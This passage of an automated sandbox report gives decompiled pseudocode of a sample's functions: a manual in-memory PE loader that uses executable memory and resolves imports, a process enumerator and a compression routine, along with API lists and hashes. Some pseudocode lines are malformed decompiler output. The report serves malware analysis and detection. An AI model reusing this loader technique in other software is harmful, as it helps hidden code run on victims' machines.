                      • Opcode Fuzzy Hash: b3f0213c0bdf6bda41b205d5e3970cc7be6a8c11402c8057db4603c4a09763e7
                      • Instruction Fuzzy Hash: 49F096707803017FF97533B96C2EF8F39195B50B8EF205410F606AA6CAEE61480247B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      C-Code - Quality: 100%
                      			E01381F40(void* __ecx, void* __edx) {
                      				intOrPtr* _v8;
                      				intOrPtr _v12;
                      				intOrPtr* _v16;
                      				struct HINSTANCE__* _v20;
                      				intOrPtr _t55;
                      				struct HINSTANCE__* _t59;
                      				intOrPtr _t60;
                      				intOrPtr _t61;
                      				signed short _t65;
                      				CHAR* _t68;
                      				_Unknown_base(*)()* _t69;
                      				intOrPtr* _t70;
                      				signed int _t71;
                      				void* _t79;
                      				intOrPtr _t81;
                      				struct HINSTANCE__* _t82;
                      				void* _t85;
                      				intOrPtr _t86;
                      				signed short* _t89;
                      				void* _t90;
                      				intOrPtr* _t91;
                      				_Unknown_base(*)()** _t93;
                      				void* _t96;
                      				intOrPtr* _t99;
                      				void* _t102;
                      				intOrPtr* _t104;
                      				signed short* _t106;
                      				void* _t108;
                      				void* _t109;
                      				signed short _t128;
                      
                      				_t79 = 0;
                      				_t90 = __ecx;
                      				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
                      					L33:
                      					return _t79;
                      				} else {
                      					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                      					_v8 = _t99;
                      					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
                      						L32:
                      						goto L33;
                      					} else {
                      						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
                      						if(_t79 != 0) {
                      							memcpy(_t79, _t90,  *(_t99 + 0x54));
                      							_t109 = _t108 + 0xc;
                      							_t81 = _v8;
                      							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
                      							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
                      							_v12 = _t55;
                      							if(_t102 < _t55) {
                      								do {
                      									_t86 =  *((intOrPtr*)(_t102 + 0x10));
                      									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
                      									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
                      									_t102 = _t102 + 0x28;
                      									_t109 = _t109 + 0xc;
                      								} while (_t102 < _v12);
                      								_t81 = _v8;
                      							}
                      							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
                      							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
                      							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
                      							_v20 = _t59;
                      							if(_t104 < _t59) {
                      								do {
                      									_t70 = _t104 + 4;
                      									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
                      									_v16 = _t70;
                      									_t89 = _t104 + 8;
                      									if(_t89 < _t96) {
                      										do {
                      											_t71 =  *_t89 & 0x0000ffff;
                      											_t85 = (_t71 & 0x00000fff) +  *_t104;
                      											if((_t71 & 0x0000f000) == 0x3000) {
                      												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
                      											}
                      											_t89 =  &(_t89[1]);
                      										} while (_t89 < _t96);
                      										_t70 = _v16;
                      									}
                      									_t104 = _t104 +  *_t70;
                      								} while (_t104 < _v20);
                      								_t81 = _v8;
                      							}
                      							_t60 =  *((intOrPtr*)(_t81 + 0x80));
                      							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
                      								_t91 = _t60 + _t79;
                      								_t61 =  *((intOrPtr*)(_t91 + 0xc));
                      								_v8 = _t91;
                      								if(_t61 != 0) {
                      									while(1) {
                      										_t82 = LoadLibraryA(_t61 + _t79);
                      										_v20 = _t82;
                      										if(_t82 == 0) {
                      											break;
                      										}
                      										_t106 =  *_t91 + _t79;
                      										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
                      										_t65 =  *_t106;
                      										_t128 = _t65;
                      										if(_t128 == 0) {
                      											L29:
                      											_t91 = _v8 + 0x14;
                      											_v8 = _t91;
                      											_t61 =  *((intOrPtr*)(_t91 + 0xc));
                      											if(_t61 != 0) {
                      												continue;
                      											} else {
                      												return _t79;
                      											}
                      										} else {
                      											L24:
                      											L24:
                      											if(_t128 >= 0) {
                      												_t68 = _t65 + 2 + _t79;
                      											} else {
                      												_t68 = _t65 & 0x0000ffff;
                      											}
                      											_t69 = GetProcAddress(_t82, _t68);
                      											if(_t69 == 0) {
                      												break;
                      											}
                      											_t82 = _v20;
                      											_t106 =  &(_t106[2]);
                      											 *_t93 = _t69;
                      											_t93 = _t93 + 4;
                      											_t65 =  *_t106;
                      											if(_t65 != 0) {
                      												goto L24;
                      											} else {
                      												goto L29;
                      											}
                      										}
                      										goto L34;
                      									}
                      									VirtualFree(_t79, 0, 0x8000);
                      									_t79 = 0;
                      								}
                      							}
                      						}
                      						goto L32;
                      					}
                      				}
                      				L34:
                      			}

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,01388A23,?,000DBBA0), ref: 01381F92
                      • memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01381FA7
                      • memcpy.NTDLL(?,?,?), ref: 01381FE7
                      • LoadLibraryA.KERNEL32(01388F82), ref: 01382093
                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 013820BF
                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013820FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtualmemcpy$AddressAllocFreeLibraryLoadProc
                      • String ID:
                      • API String ID: 4175162697-0
                      • Opcode ID: 2496f43c1da21b99d92f3e18386f46f61b8d6f4dd5ae522561f272d2e0969c25
                      • Instruction ID: 1db7323b6288da56b0562f2f18438e5f8678931e16dd6deca20e27d82ae77d02
                      • Opcode Fuzzy Hash: 2496f43c1da21b99d92f3e18386f46f61b8d6f4dd5ae522561f272d2e0969c25
                      • Instruction Fuzzy Hash: D8519EB1A003159FDB20DF5DC880BAAB7F9FF44318F284469E946E7242E771E956CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E01382110(intOrPtr* __edx) {
                      				void* _v560;
                      				void* _t5;
                      				struct tagPROCESSENTRY32W* _t6;
                      				intOrPtr* _t13;
                      				void* _t14;
                      
                      				_t13 = __edx;
                      				_t5 = CreateToolhelp32Snapshot(2, 0);
                      				_t14 = _t5;
                      				if(_t14 != 0xffffffff) {
                      					_t6 =  &_v560;
                      					_v560 = 0x22c;
                      					Process32FirstW(_t14, _t6);
                      					if(_t6 == 0) {
                      						L5:
                      						return CloseHandle(_t14);
                      					}
                      					do {
                      					} while (E01388B30( &_v560, _t13) != 0 && Process32NextW(_t14,  &_v560) != 0);
                      					goto L5;
                      				}
                      				return _t5;
                      			}

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01382121
                      • Process32FirstW.KERNEL32(00000000,?), ref: 01382140
                      • CloseHandle.KERNEL32(00000000,?,?), ref: 01382174
                        • Part of subcall function 01388B30: GetCurrentProcessId.KERNEL32(00000000,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B47
                        • Part of subcall function 01388B30: GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0138215D,0000022C,00000000,?,?), ref: 01388B75
                        • Part of subcall function 01388B30: RtlAllocateHeap.NTDLL(00000000,?,0138215D), ref: 01388B7C
                        • Part of subcall function 01388B30: lstrcpyW.KERNEL32(00000004,?), ref: 01388B8F
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 01382169
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextSnapshotToolhelp32lstrcpy
                      • String ID:
                      • API String ID: 3893281644-0
                      • Opcode ID: bc6aa92f0d8ed49bd531c970b0127c733b6af4d9327265a7a5c7ea1512b5622a
                      • Instruction ID: 23d267d7e1638304815b69eed61de1868dc79d3812e1a431f46f74c394999394
                      • Opcode Fuzzy Hash: bc6aa92f0d8ed49bd531c970b0127c733b6af4d9327265a7a5c7ea1512b5622a
                      • Instruction Fuzzy Hash: 12F04F795013146AE720ABB9BC4CBEF7AACAB89754F2441A5EE04D2184E7309505CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E01386E70(intOrPtr* __ecx, intOrPtr __edx) {
                      				int _v8;
                      				int _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _t274;
                      				signed char _t282;
                      				int _t285;
                      				intOrPtr _t286;
                      				intOrPtr _t294;
                      				signed int _t304;
                      				signed char _t308;
                      				signed char _t311;
                      				signed char _t320;
                      				signed char _t331;
                      				signed char _t334;
                      				signed char _t340;
                      				signed char _t352;
                      				signed char _t355;
                      				signed int _t364;
                      				void* _t366;
                      				int _t367;
                      				signed char _t370;
                      				intOrPtr _t371;
                      				signed char _t374;
                      				signed char _t375;
                      				signed char _t376;
                      				char* _t377;
                      				char* _t378;
                      				char* _t379;
                      				signed char _t380;
                      				char* _t381;
                      				char* _t382;
                      				signed char _t385;
                      				signed char _t386;
                      				signed char _t387;
                      				char* _t388;
                      				char* _t389;
                      				char* _t390;
                      				char* _t391;
                      				char* _t396;
                      				signed char _t397;
                      				signed char _t398;
                      				char* _t399;
                      				char* _t400;
                      				intOrPtr _t401;
                      				intOrPtr _t402;
                      				signed int _t403;
                      				void* _t404;
                      				void* _t405;
                      				signed int _t406;
                      				void* _t407;
                      				int _t408;
                      				intOrPtr _t409;
                      				int _t412;
                      				signed int _t413;
                      				void* _t414;
                      				intOrPtr* _t415;
                      				void* _t416;
                      
                      				_t402 = __edx;
                      				_t415 = __ecx;
                      				_v24 = __edx;
                      				_v12 = 0;
                      				if(( *(__ecx + 8) & 0x00080000) == 0) {
                      					L2:
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      					if( *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
                      						goto L2;
                      					}
                      				}
                      				if( *_t415 != 0) {
                      					L6:
                      					_t274 = _t415 + 0x39272;
                      				} else {
                      					_t401 =  *((intOrPtr*)(_t415 + 0x8c));
                      					if( *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t401 < 0x14ccc) {
                      						goto L6;
                      					} else {
                      						_t274 =  *((intOrPtr*)(_t415 + 0x74)) + _t401;
                      					}
                      				}
                      				 *((intOrPtr*)(_t415 + 0x30)) = _t274;
                      				_v20 = _t274;
                      				 *((intOrPtr*)(_t415 + 0x34)) = _t274 + 0x14cbc;
                      				 *(_t415 + 0x58) = 0;
                      				 *(_t415 + 0x5c) = 0;
                      				 *( *(_t415 + 0x2c)) =  *( *(_t415 + 0x2c)) >>  *(_t415 + 0x38);
                      				 *((intOrPtr*)(_t415 + 0x28)) =  *((intOrPtr*)(_t415 + 0x28)) - (0 |  *(_t415 + 0x38) == 0x00000008);
                      				if(( *(_t415 + 8) & 0x00001000) != 0 &&  *((intOrPtr*)(_t415 + 0x64)) == 0) {
                      					_t397 =  *(_t415 + 0x44);
                      					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000078 << _t397;
                      					_t352 = _t397 + 8;
                      					 *(_t415 + 0x44) = _t352;
                      					if(_t352 >= 8) {
                      						do {
                      							_t400 =  *((intOrPtr*)(_t415 + 0x30));
                      							if(_t400 <  *((intOrPtr*)(_t415 + 0x34))) {
                      								 *_t400 =  *(_t415 + 0x48);
                      								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      							}
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      						} while ( *(_t415 + 0x44) >= 8);
                      					}
                      					_t398 =  *(_t415 + 0x44);
                      					 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0x00000001 << _t398;
                      					_t49 = _t398 + 8; // 0x10
                      					_t355 = _t49;
                      					 *(_t415 + 0x44) = _t355;
                      					if(_t355 >= 8) {
                      						do {
                      							_t399 =  *((intOrPtr*)(_t415 + 0x30));
                      							if(_t399 <  *((intOrPtr*)(_t415 + 0x34))) {
                      								 *_t399 =  *(_t415 + 0x48);
                      								 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      							}
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      							 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      						} while ( *(_t415 + 0x44) >= 8);
                      					}
                      				}
                      				_t370 =  *(_t415 + 0x44);
                      				 *(_t415 + 0x48) =  *(_t415 + 0x48) | (0 | _t402 == 0x00000004) << _t370;
                      				_t66 = _t370 + 1; // 0x9
                      				_t282 = _t66;
                      				 *(_t415 + 0x44) = _t282;
                      				if(_t282 >= 8) {
                      					do {
                      						_t396 =  *((intOrPtr*)(_t415 + 0x30));
                      						if(_t396 <  *((intOrPtr*)(_t415 + 0x34))) {
                      							 *_t396 =  *(_t415 + 0x48);
                      							 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      						}
                      						 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      						 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      					} while ( *(_t415 + 0x44) >= 8);
                      				}
                      				_t403 =  *(_t415 + 0x48);
                      				_t409 =  *((intOrPtr*)(_t415 + 0x30));
                      				_t364 =  *(_t415 + 0x44);
                      				_v16 = _t403;
                      				if(_v8 != 0) {
                      					L31:
                      					if( *((intOrPtr*)(_t415 + 0x1c)) -  *((intOrPtr*)(_t415 + 0x40)) >  *((intOrPtr*)(_t415 + 0x24))) {
                      						_t285 = _v12;
                      						goto L58;
                      					} else {
                      						 *((intOrPtr*)(_t415 + 0x30)) = _t409;
                      						 *(_t415 + 0x48) = 0 << _t364 | _t403;
                      						_t331 = _t364 + 2;
                      						 *(_t415 + 0x44) = _t331;
                      						if(_t331 >= 8) {
                      							do {
                      								_t391 =  *((intOrPtr*)(_t415 + 0x30));
                      								if(_t391 <  *((intOrPtr*)(_t415 + 0x34))) {
                      									 *_t391 =  *(_t415 + 0x48);
                      									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      								}
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      							} while ( *(_t415 + 0x44) >= 8);
                      						}
                      						_t385 =  *(_t415 + 0x44);
                      						if(_t385 != 0) {
                      							 *(_t415 + 0x44) = 8;
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t385;
                      							do {
                      								_t390 =  *((intOrPtr*)(_t415 + 0x30));
                      								if(_t390 <  *((intOrPtr*)(_t415 + 0x34))) {
                      									 *_t390 =  *(_t415 + 0x48);
                      									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      								}
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      							} while ( *(_t415 + 0x44) >= 8);
                      						}
                      						_t407 = 2;
                      						do {
                      							_t386 =  *(_t415 + 0x44);
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(_t415 + 0x3c) & 0x0000ffff) << _t386;
                      							_t126 = _t386 + 0x10; // 0x18
                      							_t334 = _t126;
                      							 *(_t415 + 0x44) = _t334;
                      							if(_t334 >= 8) {
                      								do {
                      									_t389 =  *((intOrPtr*)(_t415 + 0x30));
                      									if(_t389 <  *((intOrPtr*)(_t415 + 0x34))) {
                      										 *_t389 =  *(_t415 + 0x48);
                      										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      									}
                      									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      								} while ( *(_t415 + 0x44) >= 8);
                      							}
                      							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
                      							_t407 = _t407 - 1;
                      						} while (_t407 != 0);
                      						if( *(_t415 + 0x3c) > _t407) {
                      							do {
                      								_t387 =  *(_t415 + 0x44);
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
                      								_t147 = _t387 + 8; // 0x10
                      								_t340 = _t147;
                      								 *(_t415 + 0x44) = _t340;
                      								if(_t340 >= 8) {
                      									do {
                      										_t388 =  *((intOrPtr*)(_t415 + 0x30));
                      										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
                      											 *_t388 =  *(_t415 + 0x48);
                      											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      										}
                      										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      									} while ( *(_t415 + 0x44) >= 8);
                      								}
                      								_t407 = _t407 + 1;
                      							} while (_t407 <  *(_t415 + 0x3c));
                      						}
                      					}
                      				} else {
                      					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
                      						E01386A80(_t415);
                      					} else {
                      						E01385B10(_t415);
                      					}
                      					_t416 = _t416 + 4;
                      					_t285 = E01386C30(_t415);
                      					_t408 =  *(_t415 + 0x3c);
                      					_v12 = _t285;
                      					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
                      						L58:
                      						if(_t285 == 0) {
                      							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
                      							 *(_t415 + 0x48) = _v16;
                      							 *(_t415 + 0x44) = _t364;
                      							E01386A80(_t415);
                      							_t416 = _t416 + 4;
                      							E01386C30(_t415);
                      						}
                      					} else {
                      						_t403 = _v16;
                      						goto L31;
                      					}
                      				}
                      				_t286 = _v24;
                      				if(_t286 != 0) {
                      					_t374 =  *(_t415 + 0x44);
                      					if(_t286 != 4) {
                      						_t413 = 0;
                      						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
                      						_t308 = _t374 + 3;
                      						 *(_t415 + 0x44) = _t308;
                      						if(_t308 >= 8) {
                      							do {
                      								_t379 =  *((intOrPtr*)(_t415 + 0x30));
                      								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
                      									 *_t379 =  *(_t415 + 0x48);
                      									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      								}
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      							} while ( *(_t415 + 0x44) >= 8);
                      						}
                      						_t375 =  *(_t415 + 0x44);
                      						if(_t375 != 0) {
                      							 *(_t415 + 0x44) = 8;
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
                      							do {
                      								_t378 =  *((intOrPtr*)(_t415 + 0x30));
                      								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
                      									 *_t378 =  *(_t415 + 0x48);
                      									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      								}
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      							} while ( *(_t415 + 0x44) >= 8);
                      						}
                      						_t405 = 2;
                      						do {
                      							_t376 =  *(_t415 + 0x44);
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
                      							_t230 = _t376 + 0x10; // 0x18
                      							_t311 = _t230;
                      							 *(_t415 + 0x44) = _t311;
                      							if(_t311 >= 8) {
                      								do {
                      									_t377 =  *((intOrPtr*)(_t415 + 0x30));
                      									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
                      										 *_t377 =  *(_t415 + 0x48);
                      										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      									}
                      									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      								} while ( *(_t415 + 0x44) >= 8);
                      							}
                      							_t413 = _t413 ^ 0x0000ffff;
                      							_t405 = _t405 - 1;
                      						} while (_t405 != 0);
                      					} else {
                      						if(_t374 != 0) {
                      							 *(_t415 + 0x44) = 8;
                      							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
                      							do {
                      								_t382 =  *((intOrPtr*)(_t415 + 0x30));
                      								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
                      									 *_t382 =  *(_t415 + 0x48);
                      									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      								}
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      							} while ( *(_t415 + 0x44) >= 8);
                      						}
                      						if(( *(_t415 + 8) & 0x00001000) != 0) {
                      							_t406 =  *(_t415 + 0x18);
                      							_t414 = 4;
                      							do {
                      								_t380 =  *(_t415 + 0x44);
                      								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
                      								_t187 = _t380 + 8; // 0x10
                      								_t320 = _t187;
                      								 *(_t415 + 0x44) = _t320;
                      								if(_t320 >= 8) {
                      									do {
                      										_t381 =  *((intOrPtr*)(_t415 + 0x30));
                      										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
                      											 *_t381 =  *(_t415 + 0x48);
                      											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
                      										}
                      										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
                      										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
                      									} while ( *(_t415 + 0x44) >= 8);
                      								}
                      								_t406 = _t406 << 8;
                      								_t414 = _t414 - 1;
                      							} while (_t414 != 0);
                      						}
                      					}
                      				}
                      				memset(_t415 + 0x8192, 0, 0x240);
                      				memset(_t415 + 0x83d2, 0, 0x40);
                      				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
                      				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
                      				 *(_t415 + 0x2c) = _t415 + 0x9272;
                      				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
                      				_t294 = _v20;
                      				 *(_t415 + 0x38) = 8;
                      				 *(_t415 + 0x3c) = 0;
                      				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
                      				if(_t366 == 0) {
                      					L98:
                      					return  *(_t415 + 0x5c);
                      				} else {
                      					if( *_t415 == 0) {
                      						_t404 = _t415 + 0x39272;
                      						if(_t294 != _t404) {
                      							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
                      							goto L98;
                      						} else {
                      							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
                      							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
                      							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
                      							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
                      							_t367 = _t366 - _t412;
                      							if(_t367 == 0) {
                      								goto L98;
                      							} else {
                      								 *(_t415 + 0x58) = _t412;
                      								 *(_t415 + 0x5c) = _t367;
                      								return _t367;
                      							}
                      						}
                      					} else {
                      						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
                      						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
                      						if(_t304 != 0) {
                      							goto L98;
                      						} else {
                      							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
                      							return _t304 | 0xffffffff;
                      						}
                      					}
                      				}
                      			}

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: memset
                      • String ID:
                      • API String ID: 2221118986-0
                      • Opcode ID: e84141946dbefa1f75464018f9c7ea7134a22ca544491531a25b0a968ffe7bc6
                      • Instruction ID: 0a26b9840b70a68d72e73f49ec33ed3a7cab3d73d35aff6ea3987398cc370506
                      • Opcode Fuzzy Hash: e84141946dbefa1f75464018f9c7ea7134a22ca544491531a25b0a968ffe7bc6
                      • Instruction Fuzzy Hash: 4C026370511B108FDB36DF29C684666BBF2FF45628B640A2EC6E786EA1D336F445CB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlGetVersion.NTDLL(?), ref: 01388D6D
                      • GetNativeSystemInfo.KERNEL32(?), ref: 01388D77
                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystemVersion
                      • String ID:
                      • API String ID: 2296905803-0
                      • Opcode ID: 07fcb3418a5cfda6ec33b4d1a6faa7dfe4b4193b2d589aba70e51629639a07aa
                      • Instruction ID: 1bd34d36b541a7ba03c149201a2857143140c88194703442908112e8dbae008c
                      • Opcode Fuzzy Hash: 07fcb3418a5cfda6ec33b4d1a6faa7dfe4b4193b2d589aba70e51629639a07aa
                      • Instruction Fuzzy Hash: ACF03132D106184BF761CF6ACC456CCB7F9E788304F0481A0E42DF6609D6B4EA15DB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 99%
                      			E013877F0(intOrPtr* __ecx) {
                      				signed int _v8;
                      				intOrPtr* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				intOrPtr* _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				intOrPtr _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				char _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				intOrPtr _v72;
                      				intOrPtr* _v76;
                      				intOrPtr _t375;
                      				signed int _t380;
                      				signed int _t381;
                      				signed int _t382;
                      				signed int _t390;
                      				void* _t402;
                      				signed int _t410;
                      				unsigned int* _t411;
                      				unsigned int* _t420;
                      				signed int _t432;
                      				unsigned int* _t434;
                      				unsigned int* _t451;
                      				unsigned int* _t453;
                      				void* _t463;
                      				void* _t480;
                      				signed int _t483;
                      				signed int _t494;
                      				signed char _t504;
                      				signed int _t508;
                      				signed int _t509;
